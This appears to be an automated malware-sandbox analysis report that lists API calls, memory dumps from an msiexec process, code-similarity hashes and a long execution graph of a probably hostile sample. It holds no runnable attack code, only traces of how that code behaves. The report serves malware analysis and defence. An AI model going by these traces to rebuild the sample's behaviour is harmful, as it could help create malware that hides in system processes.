• GetLastError.KERNEL32(?,21DE5C88,21DE1D66,00000000,00000000,00000000,?,21DE5E85,00000006,FlsSetValue,21DEE190,FlsSetValue,00000000,00000364,?,21DE5BC8), ref: 21DE5D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21DE5C88,21DE1D66,00000000,00000000,00000000,?,21DE5E85,00000006,FlsSetValue,21DEE190,FlsSetValue,00000000), ref: 21DE5D2D
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 56f9abb91094481852e2c2e03d23e8556adec45edcf3d038f920584b31acb734
• Instruction ID: f04c07d8cd1c705cdf842890a6c92f408e9c3f6c775acb27aa479d8374f35493
• Opcode Fuzzy Hash: 56f9abb91094481852e2c2e03d23e8556adec45edcf3d038f920584b31acb734
• Instruction Fuzzy Hash: 3901AC3A651632EBC7125E6C9C4CE467B5CAF0A6F37150628F91ED7140DB36D512C7E0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,214E6C28,?,00000000,00000000,00000000,?,214E6E99,00000006,FlsSetValue), ref: 214E6CB3
• GetLastError.KERNEL32(?,214E6C28,?,00000000,00000000,00000000,?,214E6E99,00000006,FlsSetValue,214F3FF8,214F4000,00000000,00000364,?,214E6B4E), ref: 214E6CBF
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,214E6C28,?,00000000,00000000,00000000,?,214E6E99,00000006,FlsSetValue,214F3FF8,214F4000,00000000), ref: 214E6CCD
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 94e2830af36c4ed0d852cbbbb300f32ec0df89cfbc521f85fab0e26ab5a53d67
• Instruction ID: 25431042d96938e8315a0c7eed57434d2e39fe0e2cf6074ce3490ae41aa26c41
• Opcode Fuzzy Hash: 94e2830af36c4ed0d852cbbbb300f32ec0df89cfbc521f85fab0e26ab5a53d67
• Instruction Fuzzy Hash: F301F736A55232ABC7118A698D48E567B9CEF066A2F110624FE0ED3342DB34D531CBE0
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 21DE2276
• GetCurrentThreadId.KERNEL32 ref: 21DE2285
• GetCurrentProcessId.KERNEL32 ref: 21DE228E
• QueryPerformanceCounter.KERNEL32(?), ref: 21DE229B
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: b0c2d6029140f28fb5b4f9a84036533389f82bb47f7afb2a5da8ba9515586075
• Instruction ID: db185fc04b71fc918e52a072d2ce7601de1622b36541a31188edfb11394c848e
• Opcode Fuzzy Hash: b0c2d6029140f28fb5b4f9a84036533389f82bb47f7afb2a5da8ba9515586075
• Instruction Fuzzy Hash: C2F0AF70C10208EBCB00DBB0C549A9EBBF8FF08346F5144959402E7100EB38AB158B50
APIs
• RtlEncodePointer.NTDLL(00000000), ref: 214DC12E
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 94055b8e00c7f54b4e2a28e41b51943ede9a447a884514e96a0c9293cbda8c28
• Instruction ID: b60a5585ab543e1e41d050d371f9af0a4530765a01afa8abbe7eba7916a39f85
• Opcode Fuzzy Hash: 94055b8e00c7f54b4e2a28e41b51943ede9a447a884514e96a0c9293cbda8c28
• Instruction Fuzzy Hash: AD416B3250010DEFDF02CF94C890EAEBBAAEF59714F25818DEA1C57251C335EA51DB90

Execution Graph

Execution Coverage: 5.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 74
                                                                                                                                                                                                          execution_graph 40275 441819 40278 430737 40275->40278 40277 441825 40279 430756 40278->40279 40280 43076d 40278->40280 40281 430774 40279->40281 40282 43075f 40279->40282 40280->40277 40293 43034a memcpy 40281->40293 40292 4169a7 11 API calls 40282->40292 40285 4307ce 40286 430819 memset 40285->40286 40294 415b2c 11 API calls 40285->40294 40286->40280 40287 43077e 40287->40280 40287->40285 40290 4307fa 40287->40290 40289 4307e9 40289->40280 40289->40286 40295 4169a7 11 API calls 40290->40295 40292->40280 40293->40287 40294->40289 40295->40280 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37965 40dd07 memset 37891->37965 37892 412827 37970 40db69 memset 37892->37970 37896 412822 37992 4125b6 ??3@YAXPAX DeleteObject 37896->37992 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37975 41268e 37898->37975 37900 412966 37993 40b1ab free free 
37900->37993 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37991 37905 41296f 37994 40b633 37905->37994 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37998 40a804 memset 37930->37998 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38020 38009 444722 37941->38009 37946 41259b wcscpy 37946->37886 38025 40b1ab free free 37947->38025 37949 40ad76 38026 40aa04 37949->38026 37952 40a9ce malloc memcpy free free 37955 40ac5c 37952->37955 37953 40ad4b 37953->37949 38049 40a9ce 37953->38049 37955->37949 37955->37952 37955->37953 37956 40ace7 free 37955->37956 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956->37955 37960 40a8d0 7 API calls 37960->37949 37961 40ada2 37962 40adc9 37961->37962 37964 40adaa 37961->37964 37962->37891 37962->37892 37963 40adb3 _wcsicmp 37963->37962 37963->37964 37964->37962 37964->37963 38054 
WideCharToMultiByte 39302->39356 39304 409202 39357 444432 39304->39357 39307 40b273 27 API calls 39308 409236 39307->39308 39403 438552 39308->39403 39311 409383 39313 40b273 27 API calls 39311->39313 39315 409399 39313->39315 39314 409254 39316 40937b 39314->39316 39424 4253cf 17 API calls 39314->39424 39317 438552 133 API calls 39315->39317 39428 424f26 122 API calls 39316->39428 39336 4093a3 39317->39336 39320 409267 39425 4253cf 17 API calls 39320->39425 39321 4094ff 39432 443d90 39321->39432 39324 4251c4 136 API calls 39324->39336 39325 409273 39426 4253af 17 API calls 39325->39426 39326 409507 39334 40951d 39326->39334 39452 408f2f 77 API calls 39326->39452 39328 4093df 39431 424f26 122 API calls 39328->39431 39330 4253cf 17 API calls 39330->39336 39334->39279 39336->39321 39336->39324 39336->39328 39336->39330 39338 4093e4 39336->39338 39429 4253af 17 API calls 39338->39429 39344 4093ed 39430 4253af 17 API calls 39344->39430 39347 4093f9 39347->39328 39348 409409 memcmp 39347->39348 39348->39328 39349 409421 memcmp 39348->39349 39350 4094a4 memcmp 39349->39350 39351 409435 39349->39351 39350->39328 39353 4094b8 memcpy memcpy 39350->39353 39351->39328 39352 409442 memcpy memcpy memcpy 39351->39352 39352->39328 39353->39328 39354->39287 39355->39290 39356->39304 39453 4438b5 39357->39453 39359 44444c 39365 409215 39359->39365 39467 415a6d 39359->39467 39362 444486 39364 4444b9 memcpy 39362->39364 39402 4444a4 39362->39402 39363 44469e 39363->39365 39367 443d90 110 API calls 39363->39367 39471 415258 39364->39471 39365->39307 39365->39334 39367->39365 39368 444524 39369 444541 39368->39369 39370 44452a 39368->39370 39474 444316 39369->39474 39508 416935 39370->39508 39374 444316 18 API calls 39375 444563 39374->39375 39376 444316 18 API calls 39375->39376 39377 44456f 39376->39377 39378 444316 18 API calls 39377->39378 39379 44457f 39378->39379 39379->39402 39488 432d4e 39379->39488 39382 444316 18 API calls 39383 4445b0 39382->39383 39492 41eed2 39383->39492 
39521 4442e6 11 API calls 39402->39521 39522 438460 39403->39522 39405 409240 39405->39311 39406 4251c4 39405->39406 39534 424f07 39406->39534 39408 4251e4 39409 4251f7 39408->39409 39410 4251e8 39408->39410 39542 4250f8 39409->39542 39541 4446ea 11 API calls 39410->39541 39412 4251f2 39412->39314 39414 425209 39417 425249 39414->39417 39420 4250f8 126 API calls 39414->39420 39421 425287 39414->39421 39550 4384e9 134 API calls 39414->39550 39551 424f74 123 API calls 39414->39551 39417->39421 39552 424ff0 13 API calls 39417->39552 39420->39414 39554 415c7d 16 API calls 39421->39554 39422 425266 39422->39421 39553 415be9 memcpy 39422->39553 39424->39320 39425->39325 39428->39311 39429->39344 39430->39347 39431->39321 39433 443da3 39432->39433 39451 443db6 39432->39451 39555 41707a 39433->39555 39435 443da8 39436 443dac 39435->39436 39438 443dbc 39435->39438 39568 4446ea 11 API calls 39436->39568 39560 4300e8 39438->39560 39451->39326 39452->39334 39454 4438d0 39453->39454 39460 4438c9 39453->39460 39455 415378 memcpy memcpy 39454->39455 39456 4438d5 39455->39456 39457 4154e2 10 API calls 39456->39457 39458 443906 39456->39458 39456->39460 39457->39458 39459 443970 memset 39458->39459 39458->39460 39462 44398b 39459->39462 39460->39359 39461 415700 10 API calls 39464 4439c0 39461->39464 39463 41975c 10 API calls 39462->39463 39465 4439a0 39462->39465 39463->39465 39464->39460 39466 418981 10 API calls 39464->39466 39465->39460 39465->39461 39466->39460 39468 415a77 39467->39468 39469 415a8d 39468->39469 39470 415a7e memset 39468->39470 39469->39362 39470->39469 39472 4438b5 11 API calls 39471->39472 39473 41525d 39472->39473 39473->39368 39475 444328 39474->39475 39476 444423 39475->39476 39477 44434e 39475->39477 39478 4446ea 11 API calls 39476->39478 39479 432d4e memset memset memcpy 39477->39479 39485 444381 39478->39485 39480 44435a 39479->39480 39482 444375 39480->39482 39487 44438b 39480->39487 39481 432d4e memset memset memcpy 39483 4443ec 39481->39483 39484 
416935 16 API calls 39482->39484 39483->39485 39486 416935 16 API calls 39483->39486 39484->39485 39485->39374 39486->39485 39487->39481 39489 432d58 39488->39489 39491 432d65 39488->39491 39490 432cc4 memset memset memcpy 39489->39490 39490->39491 39491->39382 39509 41693e 39508->39509 39512 41698e 39508->39512 39510 41694c 39509->39510 39511 422fd1 memset 39509->39511 39510->39512 39513 4165a0 11 API calls 39510->39513 39511->39510 39512->39402 39514 416972 39513->39514 39514->39512 39515 422b84 15 API calls 39514->39515 39515->39512 39521->39363 39523 41703f 11 API calls 39522->39523 39524 43847a 39523->39524 39525 43848a 39524->39525 39526 43847e 39524->39526 39528 438270 133 API calls 39525->39528 39527 4446ea 11 API calls 39526->39527 39530 438488 39527->39530 39529 4384aa 39528->39529 39529->39530 39531 424f26 122 API calls 39529->39531 39530->39405 39532 4384bb 39531->39532 39533 438270 133 API calls 39532->39533 39533->39530 39535 424f1f 39534->39535 39536 424f0c 39534->39536 39538 424eea 11 API calls 39535->39538 39537 416760 11 API calls 39536->39537 39539 424f18 39537->39539 39540 424f24 39538->39540 39539->39408 39540->39408 39541->39412 39543 425108 39542->39543 39549 42510d 39542->39549 39544 424f74 123 API calls 39543->39544 39544->39549 39545 42569b 124 API calls 39546 42516e 39545->39546 39548 415c7d 16 API calls 39546->39548 39547 425115 39547->39414 39548->39547 39549->39545 39549->39547 39550->39414 39551->39414 39552->39422 39553->39421 39554->39412 39556 417085 39555->39556 39557 4170ab 39555->39557 39556->39557 39558 416760 11 API calls 39556->39558 39557->39435 39559 4170a4 39558->39559 39559->39435 39561 430128 39560->39561 39564 4300fa 39560->39564 39563 430196 memset 39561->39563 39562 432f8c memset 39562->39564 39567 4301de 39563->39567 39564->39561 39564->39562 39564->39567 39568->39451 39598 413f4f 39571->39598 39574 413f37 K32GetModuleFileNameExW 39575 413f4a 39574->39575 39575->38708 39577 41396c wcschr 39576->39577 39579 413969 
wcscpy 39576->39579 39577->39579 39580 41398e 39577->39580 39581 413a3a 39579->39581 39603 4097f7 wcslen wcslen _memicmp 39580->39603 39581->38708 39583 41399a 39584 4139a4 memset 39583->39584 39585 4139e6 39583->39585 39604 409dd5 GetWindowsDirectoryW wcscpy 39584->39604 39587 413a31 wcscpy 39585->39587 39588 4139ec memset 39585->39588 39587->39581 39605 409dd5 GetWindowsDirectoryW wcscpy 39588->39605 39589 4139c9 wcscpy wcscat 39589->39581 39591 413a11 memcpy wcscat 39591->39581 39593 413cb0 GetModuleHandleW 39592->39593 39594 413cda 39592->39594 39593->39594 39595 413cbf GetProcAddress 39593->39595 39596 413ce3 GetProcessTimes 39594->39596 39597 413cf6 39594->39597 39595->39594 39596->38710 39597->38710 39599 413f2f 39598->39599 39600 413f54 39598->39600 39599->39574 39599->39575 39601 40a804 8 API calls 39600->39601 39602 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39601->39602 39602->39599 39603->39583 39604->39589 39605->39591 39606->38731 39607->38753 39609 409cf9 GetVersionExW 39608->39609 39610 409d0a 39608->39610 39609->39610 39610->38760 39610->38763 39611->38767 39612->38769 39613->38835 39615 40bba5 39614->39615 39662 40cc26 39615->39662 39618 40bd4b 39683 40cc0c 39618->39683 39623 40b2cc 27 API calls 39624 40bbef 39623->39624 39690 40ccf0 _wcsicmp 39624->39690 39626 40bbf5 39626->39618 39691 40ccb4 6 API calls 39626->39691 39628 40bc26 39629 40cf04 17 API calls 39628->39629 39630 40bc2e 39629->39630 39631 40bd43 39630->39631 39632 40b2cc 27 API calls 39630->39632 39633 40cc0c 4 API calls 39631->39633 39634 40bc40 39632->39634 39633->39618 39692 40ccf0 _wcsicmp 39634->39692 39636 40bc46 39636->39631 39637 40bc61 memset memset WideCharToMultiByte 39636->39637 39693 40103c strlen 39637->39693 39639 40bcc0 39640 40b273 27 API calls 39639->39640 39641 40bcd0 memcmp 39640->39641 39641->39631 39642 40bce2 39641->39642 39643 404423 37 API calls 39642->39643 39644 40bd10 39643->39644 39644->39631 39645 40bd3a LocalFree 
39644->39645 39646 40bd1f memcpy 39644->39646 39645->39631 39646->39645 39647->38850 39649 409a74 GetTempFileNameW 39648->39649 39650 409a66 GetWindowsDirectoryW 39648->39650 39649->38848 39650->39649 39651->38885 39652->38885 39653->38885 39654->38885 39655->38885 39656->38885 39657->38885 39658->38885 39659->38885 39660->38860 39661->38882 39694 4096c3 CreateFileW 39662->39694 39664 40cc34 39665 40cc3d GetFileSize 39664->39665 39666 40bbca 39664->39666 39667 40afcf 2 API calls 39665->39667 39666->39618 39674 40cf04 39666->39674 39668 40cc64 39667->39668 39695 40a2ef ReadFile 39668->39695 39670 40cc71 39696 40ab4a MultiByteToWideChar 39670->39696 39672 40cc95 CloseHandle 39673 40b04b ??3@YAXPAX 39672->39673 39673->39666 39675 40b633 free 39674->39675 39676 40cf14 39675->39676 39702 40b1ab free free 39676->39702 39678 40bbdd 39678->39618 39678->39623 39679 40cf1b 39679->39678 39681 40cfef 39679->39681 39703 40cd4b 39679->39703 39682 40cd4b 14 API calls 39681->39682 39682->39678 39684 40b633 free 39683->39684 39685 40cc15 39684->39685 39686 40aa04 free 39685->39686 39687 40cc1d 39686->39687 39752 40b1ab free free 39687->39752 39689 40b7d4 memset CreateFileW 39689->38841 39689->38842 39690->39626 39691->39628 39692->39636 39693->39639 39694->39664 39695->39670 39697 40ab6b 39696->39697 39701 40ab93 39696->39701 39698 40a9ce 4 API calls 39697->39698 39699 40ab74 39698->39699 39700 40ab7c MultiByteToWideChar 39699->39700 39700->39701 39701->39672 39702->39679 39704 40cd7b 39703->39704 39737 40aa29 39704->39737 39706 40cef5 39707 40aa04 free 39706->39707 39708 40cefd 39707->39708 39708->39679 39710 40aa29 6 API calls 39711 40ce1d 39710->39711 39712 40aa29 6 API calls 39711->39712 39713 40ce3e 39712->39713 39714 40ce6a 39713->39714 39745 40abb7 wcslen memmove 39713->39745 39715 40ce9f 39714->39715 39748 40abb7 wcslen memmove 39714->39748 39718 40a8d0 7 API calls 39715->39718 39721 40ceb5 39718->39721 39719 40ce56 39746 40aa71 wcslen 39719->39746 39720 40ce8b 39749 40aa71 
wcslen 39720->39749 39727 40a8d0 7 API calls 39721->39727 39724 40ce5e 39747 40abb7 wcslen memmove 39724->39747 39725 40ce93 39750 40abb7 wcslen memmove 39725->39750 39729 40cecb 39727->39729 39751 40d00b malloc memcpy free free 39729->39751 39731 40cedd 39732 40aa04 free 39731->39732 39733 40cee5 39732->39733 39734 40aa04 free 39733->39734 39735 40ceed 39734->39735 39736 40aa04 free 39735->39736 39736->39706 39738 40aa33 39737->39738 39744 40aa63 39737->39744 39739 40aa44 39738->39739 39740 40aa38 wcslen 39738->39740 39741 40a9ce malloc memcpy free free 39739->39741 39740->39739 39742 40aa4d 39741->39742 39743 40aa51 memcpy 39742->39743 39742->39744 39743->39744 39744->39706 39744->39710 39745->39719 39746->39724 39747->39714 39748->39720 39749->39725 39750->39715 39751->39731 39752->39689 39753->38900 39754->38908 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39764 4148b6 FindResourceW 39765 4148cf SizeofResource 39764->39765 39768 4148f9 39764->39768 39766 4148e0 LoadResource 39765->39766 39765->39768 39767 4148ee LockResource 39766->39767 39766->39768 39767->39768 37851 415304 free 39769 441b3f 39779 43a9f6 39769->39779 39771 441b61 39952 4386af memset 39771->39952 39773 44189a 39774 4418e2 39773->39774 39776 442bd4 39773->39776 39775 4418ea 39774->39775 39953 4414a9 12 API calls 39774->39953 39776->39775 39954 441409 memset 39776->39954 39780 43aa20 39779->39780 39781 43aadf 39779->39781 39780->39781 39782 43aa34 memset 39780->39782 39781->39771 39783 43aa56 39782->39783 39784 43aa4d 39782->39784 39955 43a6e7 39783->39955 39963 42c02e memset 39784->39963 39789 43aad3 39965 4169a7 11 API calls 39789->39965 39790 43aaae 39790->39781 39790->39789 39805 43aae5 39790->39805 39791 43ac18 39794 43ac47 39791->39794 39967 42bbd5 memcpy memcpy memcpy memset memcpy 39791->39967 39795 43aca8 39794->39795 39968 438eed 16 API calls 39794->39968 39798 43acd5 39795->39798 39970 4233ae 11 API calls 39795->39970 39971 423426 11 API 
calls 39798->39971 39799 43ac87 39969 4233c5 16 API calls 39799->39969 39803 43ace1 39972 439811 162 API calls 39803->39972 39804 43a9f6 160 API calls 39804->39805 39805->39781 39805->39791 39805->39804 39966 439bbb 22 API calls 39805->39966 39807 43acfd 39812 43ad2c 39807->39812 39973 438eed 16 API calls 39807->39973 39809 43ad19 39974 4233c5 16 API calls 39809->39974 39810 43ad58 39975 44081d 162 API calls 39810->39975 39812->39810 39816 43add9 39812->39816 39815 43ae3a memset 39817 43ae73 39815->39817 39816->39816 39979 423426 11 API calls 39816->39979 39980 42e1c0 146 API calls 39817->39980 39818 43adab 39977 438c4e 162 API calls 39818->39977 39821 43ad6c 39821->39781 39821->39818 39976 42370b memset memcpy memset 39821->39976 39823 43adcc 39978 440f84 12 API calls 39823->39978 39824 43ae96 39981 42e1c0 146 API calls 39824->39981 39827 43aea8 39828 43aec1 39827->39828 39982 42e199 146 API calls 39827->39982 39829 43af00 39828->39829 39983 42e1c0 146 API calls 39828->39983 39829->39781 39833 43af1a 39829->39833 39834 43b3d9 39829->39834 39984 438eed 16 API calls 39833->39984 39840 43b3f6 39834->39840 39842 43b4c8 39834->39842 39836 43b60f 39836->39781 40043 4393a5 17 API calls 39836->40043 39838 43af2f 39985 4233c5 16 API calls 39838->39985 40025 432878 12 API calls 39840->40025 39841 43af51 39986 423426 11 API calls 39841->39986 39844 43b4f2 39842->39844 40031 42bbd5 memcpy memcpy memcpy memset memcpy 39842->40031 40032 43a76c 21 API calls 39844->40032 39846 43af7d 39987 423426 11 API calls 39846->39987 39850 43b529 40033 44081d 162 API calls 39850->40033 39851 43b462 40027 423330 11 API calls 39851->40027 39852 43af94 39988 423330 11 API calls 39852->39988 39856 43afca 39989 423330 11 API calls 39856->39989 39857 43b47e 39861 43b497 39857->39861 40028 42374a memcpy memset memcpy memcpy memcpy 39857->40028 39858 43b544 39862 43b55c 39858->39862 40034 42c02e memset 39858->40034 39859 43b428 39859->39851 40026 432b60 16 API calls 39859->40026 40029 4233ae 11 API 
calls 39861->40029 40035 43a87a 162 API calls 39862->40035 39863 43afdb 39990 4233ae 11 API calls 39863->39990 39869 43b56c 39872 43b58a 39869->39872 40036 423330 11 API calls 39869->40036 39870 43b4b1 40030 423399 11 API calls 39870->40030 39871 43afee 39991 44081d 162 API calls 39871->39991 40037 440f84 12 API calls 39872->40037 39874 43b4c1 40039 42db80 162 API calls 39874->40039 39879 43b592 40038 43a82f 16 API calls 39879->40038 39882 43b5b4 40040 438c4e 162 API calls 39882->40040 39884 43b5cf 40041 42c02e memset 39884->40041 39886 43b005 39886->39781 39890 43b01f 39886->39890 39992 42d836 162 API calls 39886->39992 39887 43b1ef 40002 4233c5 16 API calls 39887->40002 39890->39887 40000 423330 11 API calls 39890->40000 40001 42d71d 162 API calls 39890->40001 39891 43b212 40003 423330 11 API calls 39891->40003 39892 43b087 39993 4233ae 11 API calls 39892->39993 39893 43add4 39893->39836 40042 438f86 16 API calls 39893->40042 39897 43b22a 40004 42ccb5 11 API calls 39897->40004 39900 43b23f 40005 4233ae 11 API calls 39900->40005 39901 43b10f 39996 423330 11 API calls 39901->39996 39903 43b257 40006 4233ae 11 API calls 39903->40006 39907 43b129 39997 4233ae 11 API calls 39907->39997 39908 43b26e 40007 4233ae 11 API calls 39908->40007 39911 43b09a 39911->39901 39994 42cc15 19 API calls 39911->39994 39995 4233ae 11 API calls 39911->39995 39912 43b282 40008 43a87a 162 API calls 39912->40008 39914 43b13c 39998 440f84 12 API calls 39914->39998 39916 43b29d 40009 423330 11 API calls 39916->40009 39919 43b15f 39999 4233ae 11 API calls 39919->39999 39920 43b2af 39922 43b2b8 39920->39922 39923 43b2ce 39920->39923 40010 4233ae 11 API calls 39922->40010 40011 440f84 12 API calls 39923->40011 39926 43b2c9 40013 4233ae 11 API calls 39926->40013 39927 43b2da 40012 42370b memset memcpy memset 39927->40012 39930 43b2f9 40014 423330 11 API calls 39930->40014 39932 43b30b 40015 423330 11 API calls 39932->40015 39934 43b325 40016 423399 11 API calls 39934->40016 39936 43b332 40017 
4233ae 11 API calls 39936->40017 39938 43b354 40018 423399 11 API calls 39938->40018 39940 43b364 40019 43a82f 16 API calls 39940->40019 39942 43b370 40020 42db80 162 API calls 39942->40020 39944 43b380 40021 438c4e 162 API calls 39944->40021 39946 43b39e 40022 423399 11 API calls 39946->40022 39948 43b3ae 40023 43a76c 21 API calls 39948->40023 39950 43b3c3 40024 423399 11 API calls 39950->40024 39952->39773 39953->39775 39954->39776 39956 43a6f5 39955->39956 39957 43a765 39955->39957 39956->39957 40044 42a115 39956->40044 39957->39781 39964 4397fd memset 39957->39964 39961 43a73d 39961->39957 39962 42a115 146 API calls 39961->39962 39962->39957 39963->39783 39964->39790 39965->39781 39966->39805 39967->39794 39968->39799 39969->39795 39970->39798 39971->39803 39972->39807 39973->39809 39974->39812 39975->39821 39976->39818 39977->39823 39978->39893 39979->39815 39980->39824 39981->39827 39982->39828 39983->39828 39984->39838 39985->39841 39986->39846 39987->39852 39988->39856 39989->39863 39990->39871 39991->39886 39992->39892 39993->39911 39994->39911 39995->39911 39996->39907 39997->39914 39998->39919 39999->39890 40000->39890 40001->39890 40002->39891 40003->39897 40004->39900 40005->39903 40006->39908 40007->39912 40008->39916 40009->39920 40010->39926 40011->39927 40012->39926 40013->39930 40014->39932 40015->39934 40016->39936 40017->39938 40018->39940 40019->39942 40020->39944 40021->39946 40022->39948 40023->39950 40024->39893 40025->39859 40026->39851 40027->39857 40028->39861 40029->39870 40030->39874 40031->39844 40032->39850 40033->39858 40034->39862 40035->39869 40036->39872 40037->39879 40038->39874 40039->39882 40040->39884 40041->39893 40042->39836 40043->39781 40045 42a175 40044->40045 40047 42a122 40044->40047 40045->39957 40050 42b13b 146 API calls 40045->40050 40047->40045 40048 42a115 146 API calls 40047->40048 40051 43a174 40047->40051 40075 42a0a8 146 API calls 40047->40075 40048->40047 40050->39961 40065 43a196 40051->40065 40066 43a19e 
40051->40066 40052 43a306 40052->40065 40095 4388c4 14 API calls 40052->40095 40055 42a115 146 API calls 40055->40066 40057 43a642 40057->40065 40099 4169a7 11 API calls 40057->40099 40061 43a635 40098 42c02e memset 40061->40098 40065->40047 40066->40052 40066->40055 40066->40065 40076 42ff8c 40066->40076 40084 415a91 40066->40084 40088 4165ff 40066->40088 40091 439504 13 API calls 40066->40091 40092 4312d0 146 API calls 40066->40092 40093 42be4c memcpy memcpy memcpy memset memcpy 40066->40093 40094 43a121 11 API calls 40066->40094 40068 42bf4c 14 API calls 40070 43a325 40068->40070 40069 4169a7 11 API calls 40069->40070 40070->40057 40070->40061 40070->40065 40070->40068 40070->40069 40071 42b5b5 memset memcpy 40070->40071 40074 4165ff 11 API calls 40070->40074 40096 42b63e 14 API calls 40070->40096 40097 42bfcf memcpy 40070->40097 40071->40070 40074->40070 40075->40047 40100 43817e 40076->40100 40078 42ff9d 40078->40066 40079 42ff99 40079->40078 40080 42ffe3 40079->40080 40081 42ffd0 40079->40081 40105 4169a7 11 API calls 40080->40105 40104 4169a7 11 API calls 40081->40104 40085 415a9d 40084->40085 40086 415ab3 40085->40086 40087 415aa4 memset 40085->40087 40086->40066 40087->40086 40254 4165a0 40088->40254 40091->40066 40092->40066 40093->40066 40094->40066 40095->40070 40096->40070 40097->40070 40098->40057 40099->40065 40101 438187 40100->40101 40103 438192 40100->40103 40106 4380f6 40101->40106 40103->40079 40104->40078 40105->40078 40108 43811f 40106->40108 40107 438164 40107->40103 40108->40107 40110 4300e8 3 API calls 40108->40110 40111 437e5e 40108->40111 40110->40108 40134 437d3c 40111->40134 40113 437eb3 40113->40108 40114 437ea9 40114->40113 40120 437f22 40114->40120 